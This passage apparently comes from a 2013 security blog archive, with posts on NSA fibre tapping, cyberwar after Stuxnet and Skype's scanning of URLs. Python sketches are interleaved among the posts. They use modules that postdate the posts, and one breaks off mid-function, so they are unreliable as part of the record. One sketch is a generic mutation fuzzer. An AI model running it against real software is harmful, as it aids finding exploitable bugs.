  • Commercial taps producing an insertion loss of just 3 dB are readily available, and cost less than $1000!
  • Taps currently in use by state-sponsored military and intelligence organizations have insertion losses as low as 0.5 dB!
  • That document points to published accounts from 2001 of the NSA tapping fibre, and I found somewhere a hint that it was first publicly revealed in 1999. I'm pretty sure we knew about the USS Jimmy Carter back then, although my memory fades...

So maybe Google thought it hard to tap fibre, but actually we've known for over a decade that this is not so. Google's bad; they are indeed negligent. Jeroen van Gelderen says:

Correct me if I'm wrong but you promise that "[w]e restrict access to personal information to Google employees, contractors and agents who need to know that information in order to process it for us, and who are subject to strict contractual confidentiality obligations and may be disciplined or terminated if they fail to meet these obligations."

    Indeed, as a matter of degree, I would say google are grossly negligent: the care that they show for physical security at their data centers, and all the care that they purport in other security matters, was clearly not shown once the fiber left their house.

    Meanwhile, given the nature of the NSA's operations, some might ask (as Jeroen does):

    Now that you have been caught being utterly negligent in protecting customer data, to the point of blatantly violating your own privacy policies, can you please tell us which of your senior security people were responsible for downplaying the risk of your thousands of miles of unsecured, easily accessible fibers being tapped? Have they been fired yet?

Chances of that one being answered are pretty slim. I can imagine Facebook being pretty relaxed about this. I can sort of see Apple dropping the ball on this. I'm not going to spare any time for Microsoft, who've been on the contract teat since time immemorial.

But google? The one with security street cred? Time to call a spade a spade: if google are not analysing and revealing how they came to miss these known and easy threats, then how do we know they aren't conspirators?
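For completeness, the fix is neither exotic nor expensive these days. A minimal sketch of wrapping an inter-datacenter link in mutually-authenticated TLS under a private internal CA -- file names and host entirely hypothetical:

    import socket, ssl

    # Client side of a mutually-authenticated internal link. Both ends
    # hold keys issued by a private internal CA; the public CA cartel is
    # not involved. The server side is the mirror image, built with
    # ssl.PROTOCOL_TLS_SERVER.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.load_verify_locations("internal-ca.pem")    # trust only our own CA
    ctx.load_cert_chain("dc1.pem", "dc1.key")       # present our own cert
    with socket.create_connection(("dc2.internal.example", 4433)) as raw:
        with ctx.wrap_socket(raw, server_hostname="dc2.internal.example") as link:
            link.sendall(b"replication traffic, now opaque to fibre taps")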

    Posted by iang at 01:34 PM | Comments (1) | TrackBack

    October 31, 2013

    Why the NSA loves the one-security-model HTTPS fanaticism of the Internet

    Of all the things I have written about the traps in the HTTPS model for security, this one diagram lays it out so well, I'm left in the dirt. Presented with little comment:

    The National Security Agency has secretly broken into the main communications links that connect Yahoo and Google data centers around the world, according to documents obtained from former NSA contractor Edward Snowden and interviews with knowledgeable officials.

    By tapping those links, the agency has positioned itself to collect at will from hundreds of millions of user accounts, many of them belonging to Americans. The NSA does not keep everything it collects, but it keeps a lot.

    Read all of the stories in The Washington Post's ongoing coverage of the National Security Agency's surveillance programs.

    According to a top-secret accounting dated Jan. 9, 2013, the NSA's acquisitions directorate sends millions of records every day from internal Yahoo and Google networks to data warehouses at the agency's headquarters at Fort Meade, Md. In the preceding 30 days, the report said, field collectors had processed and sent back 181,280,466 new records -- including "metadata," which would indicate who sent or received e-mails and when, as well as content such as text, audio and video.

    ...

    Posted by iang at 04:54 AM | Comments (0) | TrackBack

    October 29, 2013

    Confirmed: the US DoJ will not put the bankers in jail, no matter how deep the fraud

    I've often asked the question why no-one went to jail for the frauds of the financial crisis, and now the US government has answered it: they are complicit in the cover-up, which means that the financial rot has infected the Department of Justice as well. Bill Black writes about the recent Bank of America verdict:

    The author of the most brilliantly comedic statement ever written about the crisis is Landon Thomas, Jr. He does not bury the lead. Everything worth reading is in the first sentence, and it should trigger belly laughs nationwide.

"Bank of America, one of the nation’s largest banks, was found liable on Wednesday of having sold defective mortgages, a jury decision that will be seen as a victory for the government in its aggressive effort to hold banks accountable for their role in the housing crisis."

    “The government,” as a statement of fact so indisputable that it requires neither citation nor reasoning, has been engaged in an “aggressive effort to hold banks accountable for their role in the housing crisis.” Yes, we have not seen such an aggressive effort since Captain Renault told Rick in the movie Casablanca that he was “shocked” to discover that there was gambling going on (just before being handed his gambling “winnings” which were really a bribe).

    There are four clues in the sentence I quoted that indicate that the author knows he’s putting us on, but they are subtle. First, the case was a civil case. “The government’s” “aggressive effort to hold banks accountable” has produced – zero convictions of the elite Wall Street officers and banks whose frauds drove the crisis. Thomas, of course, knows this and his use of the word “aggressive” mocks the Department of Justice (DOJ) propaganda. The jurors found that BoA (through its officers) committed an orgy of fraud in order to enrich those officers. That is a criminal act. Prosecutors who are far from “aggressive” prosecute elite frauds criminally because they know it is essential to deter fraud and safeguard our financial system. The DOJ refused to prosecute the frauds led by senior BoA officers. The journalist’s riff is so funny because he portrays DOJ’s refusal to prosecute frauds led by elite BoA officers as “aggressive.” Show the NYT article to friends you have who are Brits and who claim that Americans are incapable of irony. The article’s lead sentence refutes that claim for all time.

    The twin loan origination fraud epidemics (liar’s loans and appraisal fraud) and the epidemic of fraudulent sales of the fraudulently originated mortgages to the secondary market would each – separately – constitute the most destructive frauds in history. These three epidemics of accounting control fraud by loan originators hyper-inflated the real estate bubble and drove our financial crisis and the Great Recession. By way of contrast, the S&L debacle was less than 1/70 the magnitude of fraud and losses than the current crisis, yet we obtained over 1,000 felony convictions in cases DOJ designated as “major.” If DOJ is “aggressive” in this crisis what word would be necessary to describe our approach?

    Read on for the details of how Bill Black forms his conclusion.

    Posted by iang at 05:27 AM | Comments (0) | TrackBack

    September 05, 2013

    The OODA thought cycle of the security world is around a decade -- Silent Circle releases a Secure Chat that deletes messages

According to the record, it seems I first started talking publicly about this problem in 2004, 9 years ago, in a post exchange with Bill Stewart:

    Bill Stewart wrote:
    > I don't understand the threat model here. The usual models are ...
    > - Recipient's Computer Disk automatically backed up to optical storage at night
    > - No sense subpoenaing cyphertext when you can subpoena plaintext.

    In terms of threats actually seen in the real world
    leading to costs, etc, I would have thought that the
    subpoena / civil / criminal case would be the largest.
    ...

    In summary, one of the largest threats to real people out there is that things said in the haste of the moment come back to haunt them. So I wanted a crypto-chat system that caused the messages to disappear:

    At 07:54 AM 9/17/2004, Ian Grigg wrote:
    >Ahhhh, now if one could implement a message that self-
    >destructed on the recipient's machine, that would
    >start to improve security against the above outlined
    >threat.

Think about the Arthur Andersen 'document destruction policy' memo, or as Bill goes on to list:

    That's been done, by "Disappearing Inc". www.disappearing.com/ says they're now owned by Omniva. ... The system obviously doesn't stop the recipient from screen-scraping the message (don't remember if it supported cut&paste), but it's designed for the Ollie North problem
    "What do you mean the email system backs up all messages
    on optical disk? I thought I deleted the evidence!"
    or the business equivalent (anti-trust suit wants all your correspondence from the last 17 years.)

OK, so those are bad guys, and why would we want to sell our services to them? Hopefully, they are too small a market to make a profit (and if not, we're in more trouble than we thought...).

No, I'm really thinking about the ordinary people, not the Ollie Norths of the world. The headline example here is the messy divorce, where the SBTX (soon-to-be-ex) drags out everything you said romantically and in frustration over secure chat from 10 years ago. It's a real problem, and companies have tried to solve it.

However, what gets interesting is when sparks of anger, not romance, fly:

    If a couple breaks up, one of them may disconnect the service and all the data will be deleted.

But none of these have the credibility of the security industry. They're all like Kim-dotcom efforts, which aim at serious problems but fail to get to the real end.

Now, thankfully, a company with serious security credibility has released a solution:

    WASHINGTON, D.C. – September 3, 2013 – Silent Circle, the global encrypted communications firm revolutionizing mobile device security for organizations and individuals alike, today announced the availability of its Silent Text secure messaging and file transfer app for Android devices via Google Play. With the addition of Silent Text for Android, Silent Circle's apps and services offer unmatched privacy protection by routing encrypted calls, messages and attachments exclusively between Silent Circle users' iOS and Android devices without logging metadata associated with subscribers' communications.

    Silent Text for Android's features include:

    • Burn Notice feature allows you to have any messages you send self-destruct after a time delay

    • ...

    [Jon Callas:] "Beyond strong encryption, our apps give users important, additional privacy controls, such as Silent Text's ability to wipe messages and files from a recipient's device with a 'Burn Notice.'"

    Fantastic! We may not like the rest of Silent Circle's products or solutions, but finally we have serious cryptoplumbers deploying a really needed feature. Back to me, back to 2004:

    As this threat is real, persistent and growing in popularity, the obsession of perfectly covering more crypto-savvy threats seems .. unbalanced?

Which leaves me wondering why it took so long to get the attention of the serious industry. The above quote measures the OODA loop of security threat thinking at around 9 years, call it a decade, as opposed to quicker in-protocol threats. Which scarily matches the time it took to deploy TLS/SNI. And the time it is taking from phishing threat identification (around 2003), to understanding that HTTPS Everywhere was part of the solution (2005), to deployment of HTTPS Everywhere (2012++).
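As an aside, the core of the burn feature is tiny, which makes the decade-long wait all the more striking. A minimal sketch of burn-after-delay on the recipient's side, structure hypothetical -- and note that no amount of code stops a determined recipient from screen-scraping, as Bill pointed out:

    import time

    inbox = []  # list of (expires_at, message)

    def receive(message, burn_seconds):
        inbox.append((time.time() + burn_seconds, message))

    def sweep():
        # Called periodically; drops anything past its burn time. A real
        # client must also overwrite the on-disk copies.
        now = time.time()
        inbox[:] = [(t, m) for (t, m) in inbox if t > now]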

Why does the security industry clutch so fiercely to its quaint old notions of CIA (confidentiality, integrity, availability) as received wisdom, and to security done because we can do it? A partial answer is that we are simply bad at risk. Our society, and by extension the so-called security industry, cannot handle risk management, and instead chases headline threats and bogeymen, as Bruce Schneier laments:

    We need to relearn how to recognize the trade-offs that come from risk management, especially risk from our fellow human beings. We need to relearn how to accept risk, and even embrace it, as essential to human progress and our free society. The more we expect technology to protect us from people in the same way it protects us from nature, the more we will sacrifice the very values of our society in futile attempts to achieve this security.

    He's hitting most of the bases there: risks from and to people, rather than dusty cold-war cryptographic textbooks; the technician's desire to eliminate risks 'perfectly' and ignore those he can't deal with; the adulation given to exotic technical solutions /versus/ the avoidance of risk as opportunity.

There is more: our inability to feel and measure risk accurately means we are susceptible to the dollar-incentivised snake-oil salesmen. Which leads to liability and responsibility problems, in what is termed the agency problem: we used to say that nobody ever got fired for buying IBM. During the 1990s, nobody ever got fired for implementing SSL.

    In the 2000s, nobody ever got fired for increasing the budget for Homeland Security.

    In the 2010s it seems, nobody will ever get fired for cyberwarfare. We continue as a society to be better at creating more risks for ourselves in the name of threats.

    Posted by iang at 05:02 AM | Comments (2) | TrackBack

    July 30, 2013

    The NSA is lying again -- how STOOPID are we?

In the ongoing tit-for-tat between the White House and the world (Western cyberwarriors versus Chinese cyberspies; Obama and will-he-won't-he scramble his forces to intercept a 29 year old hacker who is-flying-isn't-flying; the ongoing search for the undeniable Iranian casus belli; the secret cells in Apple and Google that are too secret to be found but no longer secret enough to be denied), one does wonder...

    Who can we believe on anything? Here's a data point. This must be the loudest YOU-ARE-STOOPID response I have ever seen from a government agency to its own populace:

    The National Security Agency lacks the technology to conduct a keyword search of its employees’ emails, even as it collects data on every U.S. phone call and monitors online communications of suspected terrorists, according to NSA’s freedom of information officer.

    “There’s no central method to search an email at this time with the way our records are set up, unfortunately,” Cindy Blacker told a reporter at the nonprofit news website ProPublica.

    Ms. Blacker said the agency’s email system is “a little antiquated and archaic,” the website reported Tuesday.

One word: counterintelligence. The NSA is a spy agency. It has a department that is mandated to look at all its people for deviation from the cause. I don't know what it's called, but more than likely there are actually several departments with this brief. And they can definitely read your email. In bulk, in minutiae, and in ways we civilians can't even conceive.

    It is standard practice at most large organizations — not to mention a standard feature of most commercially available email systems — to be able to do bulk searches of employees’ email as part of internal investigations, discovery in legal cases or compliance exercises.

    The claim that the NSA cannot look at its own email system is either a) a declaration of materially aiding the enemy by not completing its necessary and understood role of counterintelligence (in which case it should be tried in a military court, being wartime, right?), or b) a downright lie to a stupid public.

I'm inclined to think it's the second (which leaves a fascinating panoply of civilian charges). In which case, one wonders just how STOOPID the people governing the NSA are? Here's another data point:

    The numbers tell the story — in votes and dollars. On Wednesday, the House voted 217 to 205 not to rein in the NSA’s phone-spying dragnet. It turns out that those 217 “no” voters received twice as much campaign financing from the defense and intelligence industry as the 205 “yes” voters.

    .... House members who voted to continue the massive phone-call-metadata spy program, on average, raked in 122 percent more money from defense contractors than those who voted to dismantle it.

    .... Lawmakers who voted to continue the NSA dragnet-surveillance program averaged $41,635 from the pot, whereas House members who voted to repeal authority averaged $18,765.

So one must revise one's opinion lightly in the face of overwhelming financial evidence: Members of Congress are financially savvy, anything but stupid.

    Which makes the voting public...

    Posted by iang at 10:02 AM | Comments (6) | TrackBack

    July 11, 2013

    The failure of cyber defence - the mindset is against it

I have sometimes uttered the theory that the NSA is more or less responsible for the failure of the defence arts on the net. Here is some circumstantial evidence, gleaned from an interview with someone allegedly employed to hack foreigners' computers:

    Grimes: What do you wish we, as in America, could do better hacking-wise?

    Cyber warrior: I wish we spent as much time defensively as we do offensively. We have these thousands and thousands of people in coordinate teams trying to exploit stuff. But we don't have any large teams that I know of for defending ourselves. In the real world, armies spend as much time defending as they do preparing for attacks. We are pretty one-sided in the battle right now.

    My main thesis is that the NSA has erred on the side of destroying the open society's capability of defence (recall interference with PGP, GSM, IETF, cryptography, secure browsing, etc). We are bad at it in the aggregate because our attempts to do better are frustrated in oh so many ways.

The claim above suggests two things. Firstly, they only know or think to Attack!, whatever the problem. Secondly, due to a mindset of offence, the spooks in the aggregate will be unsuited to any mission to assist the defence side. And they will be widely perceived to be untrustworthy.

    Hence, any discussions of the dangerous state of civilian defences will only be used as an excuse to boost attack capabilities. Thus making the problem worse.

    For amusement, here are some other snippets:

    Grimes: What happened after you got hired?

    Cyber warrior: I immediately went to work. Basically they sent me a list of software they needed me to hack. I would hack the software and create buffer overflow exploits. I was pretty good at this. There wasn't a piece of software I couldn't break. It's not hard. Most of the software written in the world has a bug every three to five lines of code. It isn't like you have to be a supergenius to find bugs.

    But I quickly went from writing individual buffer overflows to being assigned to make better fuzzers. You and I have talked about this before. The fuzzers were far faster at finding bugs than I was. What they didn't do well is recognize the difference between a bug and an exploitable bug or recognize an exploitable bug from one that could be weaponized or widely used. My first few years all I did was write better fuzzing modules.

    Grimes: How many exploits does your unit have access to?

    Cyber warrior: Literally tens of thousands -- it's more than that. We have tens of thousands of ready-to-use bugs in single applications, single operating systems.

    Grimes: Is most of it zero-days?

    Cyber warrior: It's all zero-days. Literally, if you can name the software or the controller, we have ways to exploit it. There is no software that isn't easily crackable. In the last few years, every publicly known and patched bug makes almost no impact on us. They aren't scratching the surface.
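For readers who haven't met one, the core of a dumb mutation fuzzer really is as simple as he implies -- a minimal sketch, target and seed file hypothetical. The hard part he describes, triaging which crashes are exploitable, is entirely absent:

    import random, subprocess

    seed = open("seed-input.bin", "rb").read()

    for i in range(100000):
        data = bytearray(seed)
        # Flip a handful of random bytes in an otherwise valid input.
        for _ in range(random.randint(1, 8)):
            data[random.randrange(len(data))] = random.randrange(256)
        open("fuzzed.bin", "wb").write(data)
        # A negative return code on POSIX means the target died on a signal.
        if subprocess.run(["./target", "fuzzed.bin"]).returncode < 0:
            open("crash-%d.bin" % i, "wb").write(bytes(data))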

    Posted by iang at 04:32 AM | Comments (4) | TrackBack

    June 19, 2013

    On casting the first cyber-stone, USA declares cyberwar. Everyone loses.

Following on from revelations of the USA's unilateral act of cyberwar, otherwise known as Stuxnet, it is now apparent to all but the most self-serving of Washington lobbyists that Iran has used its defeat to learn and launch the same weapons. VanityFair has the story:

    On the hidden battlefields of history’s first known cyber-war, the casualties are piling up. In the U.S., many banks have been hit, and the telecommunications industry seriously damaged, likely in retaliation for several major attacks on Iran. Washington and Tehran are ramping up their cyber-arsenals, built on a black-market digital arms bazaar, enmeshing such high-tech giants as Microsoft, Google, and Apple.

The headline victim of the proxy war is the Saudis' state-run oil company, Saudi Aramco:

The data on three-quarters of the machines on the main computer network of Saudi Aramco had been destroyed. Hackers who identified themselves as Islamic and called themselves the Cutting Sword of Justice executed a full wipe of the hard drives of 30,000 Aramco personal computers. For good measure, as a kind of calling card, the hackers lit up the screen of each machine they wiped with a single image, of an American flag on fire.

    Which makes the American decisions all the more curious.

    For the U.S., Stuxnet was both a victory and a defeat. The operation displayed a chillingly effective capability, but the fact that Stuxnet escaped and became public was a problem.

    How did they think this would not get out? What part of 'virus' and 'anti-virus industry' did they not understand?

    Last June, David E. Sanger confirmed and expanded on the basic elements of the Stuxnet conjecture in a New York Times story, the week before publication of his book Confront and Conceal. The White House refused to confirm or deny Sanger’s account but condemned its disclosure of classified information, and the F.B.I. and Justice Department opened a criminal investigation of the leak, which is still ongoing.

    In Washingtonspeak, that means they did it. Wired and NYT confirm:

    Despite headlines around the globe, officials in Washington have never openly acknowledged that the US was behind the attack. It wasn’t until 2012 that anonymous sources within the Obama administration took credit for it in interviews with The New York Times. [snip...] Citing anonymous Obama administration officials, The New York Times reported that the malware began replicating itself and migrating to computers in other countries. [snip...] In 2006, the Department of Defense gave the go-ahead to the NSA to begin work on targeting these centrifuges, according to The New York Times.

We now have enough evidence to decide, beyond reasonable doubt, that the USA and Israel launched a first-strike cyber attack against an enemy they were not at war with. Which succeeded; the damages are credibly listed.

Back to the VanityFair article: what made the White House think they wouldn't unleash the tiger they'd tweaked by the tail?

    Sanger, for his part, said that when he reviewed his story with Obama-administration officials, they did not ask him to keep silent. According to a former White House official, in the aftermath of the Stuxnet revelations “there must have been a U.S.-government review process that said, This wasn’t supposed to happen. Why did this happen? What mistakes were made, and should we really be doing this cyber-warfare stuff? And if we’re going to do the cyber-warfare stuff again, how do we make sure (a) that the entire world doesn’t find out about it, and (b) that the whole world does not fucking collect our source code?”

None of it makes sense unless we assume that Washington DC is simply disconnected from the reality of the art of cyber-security. It gets worse:

    One of the most innovative features of all this malware—and, to many, the most disturbing—was found in Flame, the Stuxnet precursor. Flame spread, among other ways, and in some computer networks, by disguising itself as Windows Update. Flame tricked its victim computers into accepting software that appeared to come from Microsoft but actually did not. Windows Update had never previously been used as camouflage in this malicious way. By using Windows Update as cover for malware infection, Flame’s creators set an insidious precedent. If speculation that the U.S. government did deploy Flame is accurate, then the U.S. also damaged the reliability and integrity of a system that lies at the core of the Internet and therefore of the global economy.

Which Microsoft is now a conspirator in:

    Microsoft Corp. (MSFT), the world’s largest software company, provides intelligence agencies with information about bugs in its popular software before it publicly releases a fix, according to two people familiar with the process. That information can be used to protect government computers and to access the computers of terrorists or military foes.

    Redmond, Washington-based Microsoft (MSFT) and other software or Internet security companies have been aware that this type of early alert allowed the U.S. to exploit vulnerabilities in software sold to foreign governments, according to two U.S. officials. Microsoft doesn’t ask and can’t be told how the government uses such tip-offs, said the officials, who asked not to be identified because the matter is confidential.

    Frank Shaw, a spokesman for Microsoft, said those releases occur in cooperation with multiple agencies and are designed to give government “an early start” on risk assessment and mitigation.

    In an e-mailed statement, Shaw said there are “several programs” through which such information is passed to the government, and named two which are public, run by Microsoft and for defensive purposes.

    Notice the discord between those positions. Microsoft will now be vulnerable to civil suits around the world for instances where bugs were disclosed and then used against victims. Why is this? Why is the cozy cognitive dissonance of the Americans worthless elsewhere? Simple: immunity by the US Government only works in the USA. Spying, cyber attacks, and conspiracy to destroy state equipment are illegal elsewhere.

    And:

    For at least a decade, Western governments—among them the U.S., France, and Israel—have been buying “bugs” (flaws in computer programs that make breaches possible) as well as exploits (programs that perform jobs such as espionage or theft) not only from defense contractors but also from individual hackers. The sellers in this market tell stories that suggest scenes from spy novels. One country’s intelligence service creates cyber-security front companies, flies hackers in for fake job interviews, and buys their bugs and exploits to add to its stockpile. Software flaws now form the foundation of almost every government’s cyber-operations, thanks in large part to the same black market—the cyber-arms bazaar—where hacktivists and criminals buy and sell them. ...

    In the U.S., the escalating bug-and-exploit trade has created a strange relationship between government and industry. The U.S. government now spends significant amounts of time and money developing or acquiring the ability to exploit weaknesses in the products of some of America’s own leading technology companies, such as Apple, Google, and Microsoft. In other words: to sabotage American enemies, the U.S. is, in a sense, sabotaging its own companies.

    It's another variant on the old biblical 30 pieces of silver story. The US government is by practice and policy undermining the trust in its own industry.

    So where does this go? As I have oft mentioned, as long as the intelligence information collected stayed in the community, the act of spying represented not much of a threat to the people. But that is far different to aggressive first-strike attacks, and it is far different to industrial espionage run by the state:

    Thousands of technology, finance and manufacturing companies are working closely with U.S. national security agencies, providing sensitive information and in return receiving benefits that include access to classified intelligence, four people familiar with the process said.

    These programs, whose participants are known as trusted partners, extend far beyond what was revealed by Edward Snowden, a computer technician who did work for the National Security Agency. The role of private companies has come under intense scrutiny since his disclosure this month that the NSA is collecting millions of U.S. residents’ telephone records and the computer communications of foreigners from Google Inc (GOOG). and other Internet companies under court order.

    ...

    Along with the NSA, the Central Intelligence Agency (0112917D), the Federal Bureau of Investigation and branches of the U.S. military have agreements with such companies to gather data that might seem innocuous but could be highly useful in the hands of U.S. intelligence or cyber warfare units, according to the people, who have either worked for the government or are in companies that have these accords.

Pure intelligence for state purposes is no longer a plausible claim. Cyberwar is unleashed; Pandora's box is opened. The agency has crossed the commercial barriers, swapping product for information. With thousands of companies.

Back to the attack on Iran. Last week I was reading _The Rommel Papers_, the posthumous memoirs of the late great WWII general Erwin Rommel. In passing, he opined that when the 'terrorists' struck at his military operations in North Africa, the best strategy was to ignore it. He did, and nothing much happened. Specifically, he eschewed the civilian reprisals so popular in films and novels, and he did not do much or anything to chase up who might be responsible. Beyond normal police operations, presumably.

The USA's pinprick strategy is the reverse of Rommel's. And attacks on the Iranians do seem to elicit a response:

    Sure enough, in August 2012 a devastating virus was unleashed on Saudi Aramco, the giant Saudi state-owned energy company. The malware infected 30,000 computers, erasing three-quarters of the company’s stored data, destroying everything from documents to email to spreadsheets and leaving in their place an image of a burning American flag, according to The New York Times. Just days later, another large cyberattack hit RasGas, the giant Qatari natural gas company. Then a series of denial-of-service attacks took America’s largest financial institutions offline. Experts blamed all of this activity on Iran, which had created its own cyber command in the wake of the US-led attacks.

    So, let's inventory the interests here.

For uninvolved government agencies, mainstreet USA, banks, and commercial industry there and in allied countries, this is a total negative: they will bear the cost.

    For the NSA (and here I mean the NSA/CIA/DoD/Mossad group), there is no plausible harm. The NSA carries no cost. Meanwhile the NSA maintains and grows its already huge capability to collect huge amounts of boring data. And, launch pre-emptive strikes against Iran's centrifuges. And the program to sign up most of the USA's security industry in the war against everyone has yielded thousands of sign-ups, thus tarring the entirety of the USA with the same brush.

And indeed, for the NSA, the responses by Iran -- probably or arguably justifiable and "legal" under the international laws of war -- represent an opportunity to further stress their own growth. It's all upside for them:

    Inside the government, [General Alexander] is regarded with a mixture of respect and fear, not unlike J. Edgar Hoover, another security figure whose tenure spanned multiple presidencies. “We jokingly referred to him as Emperor Alexander—with good cause, because whatever Keith wants, Keith gets,” says one former senior CIA official who agreed to speak on condition of anonymity. “We would sit back literally in awe of what he was able to get from Congress, from the White House, and at the expense of everybody else.”

What about Iran? Well, it has made it clear that regime change is not on the agenda, which is what the USA really wants. As it will perceive that the USA won't stop, it has few options but to defend. Which regime would be likely to back down when it knows there is no accommodation on the other side?

Iran is a specialist in asymmetric attacks (as it has to be), so we can predict that its Stuxnet inspiration will result in many responses, past and future. Meanwhile, the USA postures that a cyber attack is cause for going physical, and the USA has never been known to back down in the face of a public lashing.

    All signs point to escalation. Which plays into the NSA's hands:

    The cat-and-mouse game could escalate. “It’s a trajectory,” says James Lewis, a cyber­security expert at the Center for Strategic and International Studies. “The general consensus is that a cyber response alone is pretty worthless. And nobody wants a real war.” Under international law, Iran may have the right to self-defense when hit with destructive cyberattacks. William Lynn, deputy secretary of defense, laid claim to the prerogative of self-defense when he outlined the Pentagon’s cyber operations strategy. “The United States reserves the right,” he said, “under the laws of armed conflict, to respond to serious cyberattacks with a proportional and justified military response at the time and place of our choosing.” Leon Panetta, the former CIA chief who had helped launch the Stuxnet offensive, would later point to Iran’s retaliation as a troubling harbinger. “The collective result of these kinds of attacks could be a cyber Pearl Harbor,” he warned in October 2012, toward the end of his tenure as defense secretary, “an attack that would cause physical destruction and the loss of life.” If Stuxnet was the proof of concept, it also proved that one successful cyberattack begets another. For Alexander, this offered the perfect justification for expanding his empire.

Conclusion? The NSA are not going to be brought to heel. Congress will remain ineffective, shy of governance and innocent of the war it has signed off on.

    The cyber divisions are going to have their day in the field. And the businesses of the USA and its public allies are going to carry the cost of a hot cyberwar.

    The U.S. banking leadership is said to be extremely unhappy at being stuck with the cost of remediation—which in the case of one specific bank amounts to well over $10 million. The banks view such costs as, effectively, an unlegislated tax in support of U.S. covert activities against Iran. The banks “want help turning [the DDoS] off, and the U.S. government is really struggling with how to do that. It’s all brand-new ground,” says a former national-security official. And banks are not the only organizations that are paying the price. As its waves of attacks continue, Qassam has targeted more banks (not only in the U.S., but also in Europe and Asia) as well as brokerages, credit-card companies, and D.N.S. servers that are part of the Internet’s physical backbone.

    And, it's going to go kinetic.

    ...at a time when the distinction between cyberwarfare and conventional warfare is beginning to blur. A recent Pentagon report made that point in dramatic terms. It recommended possible deterrents to a cyberattack on the US. Among the options: launching nuclear weapons.

Not a smart situation. When you look at the causes of this, there isn't even a plausible casus belli here. It's more like boys with too-big toys playing a first-person shoot-em-up video game, where they carry none of the costs of the shots.

    But it gets worse. Having caused this entire war to come, the biggest boy with the biggest toy says:

    Alexander runs the nation’s cyberwar efforts, an empire he has built over the past eight years by insisting that the US’s inherent vulnerability to digital attacks requires him to amass more and more authority over the data zipping around the globe. In his telling, the threat is so mind-bogglingly huge that the nation has little option but to eventually put the entire civilian Internet under his protection, requiring tweets and emails to pass through his filters, and putting the kill switch under the government’s forefinger. “What we see is an increasing level of activity on the networks,” he said at a recent security conference in Canada. “I am concerned that this is going to break a threshold where the private sector can no longer handle it and the government is going to have to step in.”

    !

    Posted by iang at 09:30 AM | Comments (1) | TrackBack

    May 16, 2013

    All Your Skype Are Belong To Us

    It's confirmed -- Skype is revealing traffic to Microsoft.

    A reader informed heise Security that he had observed some unusual network traffic following a Skype instant messaging conversation. The server indicated a potential replay attack. It turned out that an IP address which traced back to Microsoft had accessed the HTTPS URLs previously transmitted over Skype. Heise Security then reproduced the events by sending two test HTTPS URLs, one containing login information and one pointing to a private cloud-based file-sharing service. A few hours after their Skype messages, they observed the following in the server log:

    65.52.100.214 - - [30/Apr/2013:19:28:32 +0200]
    "HEAD /.../login.html?user=tbtest&password=geheim HTTP/1.1"

[Utrace map: the accesses come from systems which clearly belong to Microsoft. Source: Utrace]

They too had received visits to each of the HTTPS URLs transmitted over Skype from an IP address registered to Microsoft in Redmond. URLs pointing to encrypted web pages frequently contain unique session data or other confidential information. HTTP URLs, by contrast, were not accessed. In visiting these pages, Microsoft made use of both the login information and the specially created URL for a private cloud-based file-sharing service.

Now, the boys & girls at Heise are switched-on, unlike their counterparts on the eastern side of the pond. Notwithstanding, Adam Back of hashcash fame has confirmed the basics: URLs he sent to me over Skype were picked up and probed by Microsoft.
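The test is easy to reproduce if you run your own web server -- a minimal sketch, host name hypothetical. Send a never-guessable URL over Skype, then watch the access log:

    import secrets

    token = secrets.token_hex(16)
    canary = "https://your-server.example/canary/%s" % token
    print("Paste into a Skype chat:", canary)
    # Later, on the server:
    #     grep <token> /var/log/apache2/access.log
    # Nobody can guess the token, so any hit -- heise saw HEAD requests
    # from Microsoft's address space -- means the message was scanned
    # and the URL probed.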

    What's going on? Microsoft commented:

    In response to an enquiry from heise Security, Skype referred them to a passage from its data protection policy:

    "Skype may use automated scanning within Instant Messages and SMS to (a) identify suspected spam and/or (b) identify URLs that have been previously flagged as spam, fraud, or phishing links."

    A spokesman for the company confirmed that it scans messages to filter out spam and phishing websites.

Which means Microsoft can scan ALL messages to ANYONE. Which means they are likely fed into Echelon, either already or just as soon as someone in the NSA calls in some favours. Ten minutes later they'll be realtimed to support, and from thence to datamining, because they're pissed that google's beating the hell out of Microsoft on the Nasdaq.

    Game over?

Or exaggeration? It's all just fine and dandy, as all the NSA is interested in is matching the URLs to jihadist websites, and that's no concern of mine. But, from the manual of citizen control comes this warning:

    First they came for the jihadists,
    and I didn't speak out because I wasn't a jihadist.

    Then they came for the cypherpunks,
    and I didn't speak out because I wasn't a cypherpunk.

    Then they came for the bloggers,
    and I didn't speak out because I wasn't a blogger.

    Then they came for me,
    and there was no one left to speak for me.


    Skype, game over.

    Posted by iang at 02:25 PM | Comments (5) | TrackBack

    May 06, 2013

    What makes financial cryptography the absolutely most fun field to be in?

Quotes that struck me as on-point: Chris Skinner says of SEPA, the Single Euro Payments Area:

    One of the key issues is that when SEPA was envisaged and designed, counterparty credit risk was not top of the agenda; post-Lehman Brothers crash and it is.

    What a delight! Oh, to design a payment system without counterparty risk ... Next thing they'll be suggesting payments without theft!

    Meanwhile Dan Kaminsky says in delicious counterpoint, commenting on Bitcoin:

    But the core technology actually works, and has continued to work, to a degree not everyone predicted. Time to enjoy being wrong. What the heck is going on here?

    First of all, yes. Money changes things.

    A lot of the slop that permeates most software is much less likely to be present when the developer is aware that, yes, a single misplaced character really could End The World. The reality of most software development is that the consequences of failure are simply nonexistent. Software tends not to kill people and so we accept incredibly fast innovation loops because the consequences are tolerable and the results are astonishing.

    BitCoin was simply developed under a different reality.

    The stakes weren’t obscured, and the problem wasn’t someone else’s.

    They didn’t ignore the engineering reality, they absorbed it and innovated ridiculously

Welcome to financial cryptography -- that domain where things matter. It is this specialness, that one's code actually matters, that makes it worthwhile.

Meanwhile, from the department of lolz, comes Apple with a new patent -- filed, at least.

    The basic idea, described in a patent application “Ad-hoc cash dispensing network” is pretty simple. Create a cash dispensing server at Apple’s datacenter, to which iPhones, iPads and Macs can connect via a specialized app. Need some quick cash right now and there’s no ATM around? Launch the Cash app, and tell it how much do you need. The app picks up your location, and sends the request for cash to nearby iPhone users. When someone agrees to front you $20, his location is shown to you on the map. You go to that person, pick up the bill and confirm the transaction on your iPhone. $20 plus a small service fee is deducted from your iTunes account and deposited to the guy who gave you the cash.
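In beer-napkin form (hypothetical names throughout), the whole 'protocol' is a dozen lines. Note what is entirely absent: any protection for the party handing over the physical note.

    from dataclasses import dataclass

    def service_fee(amount):
        return round(amount * 0.05, 2)   # assumption: some small cut for Apple

    @dataclass
    class User:
        name: str
        balance: float   # iTunes account balance

        def offers(self, amount):
            return self.balance >= amount

    def request_cash(requester, amount, nearby_users):
        for lender in nearby_users:
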